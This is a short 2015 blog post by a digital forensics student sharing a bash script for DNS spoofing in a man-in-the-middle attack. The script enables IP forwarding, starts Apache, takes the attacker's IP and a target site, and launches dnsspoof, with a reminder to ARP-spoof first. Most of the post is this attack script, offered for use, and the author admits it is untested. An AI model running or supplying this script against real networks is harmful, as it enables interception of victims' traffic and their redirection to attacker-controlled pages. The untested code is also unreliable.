Intro

I am a Digital Forensics student studying at university in the UK. I also do some Cyber Security modules.
I am currently in my 2nd year.
I have mainly started this to post interesting things I have learned and problems I have encountered.
However, I will use it to do write ups about useful things I want to remember such as commands and tools I have used so I don't forget them! (To be honest, I don't expect anyone to read this!)

Tuesday 24 February 2015

Modified DNSSpoof Bash Script

This is slightly modified version of my previous post.
It only spoofs the DNS for a specific URL.
This is better for a MITM attack.

(I should really test this first actually. Oh well....)

#!/bin/bash
echo '1' > /proc/sys/net/ipv4/ip_forward
/etc/init.d/apache2 start
echo -e "REMEMBER TO PERFORM AN ARPSPOOF FIRST OTHERWISE THIS WILL NOT WORK!!!!!!"
echo -e "Please enter your IP and the site you wish to target: EG: 192.168.0.2 www.bbc.co.uk"
read INPUTDNS
echo "$INPUTDNS" > dnsspooftxt.txt
echo -e "Test file:\n\n"
cat dnsspooftxt.txt
echo -e "\n\n Are you using wlan0 or eth0?"
read NIC
echo -e "You Chose:\n"
echo -e "$NIC"
echo -e "Starting DNS Spoof...."
gnome-terminal -x dnsspoof -i "$NIC" -f dnsspooftxt.txt

No comments:

Post a Comment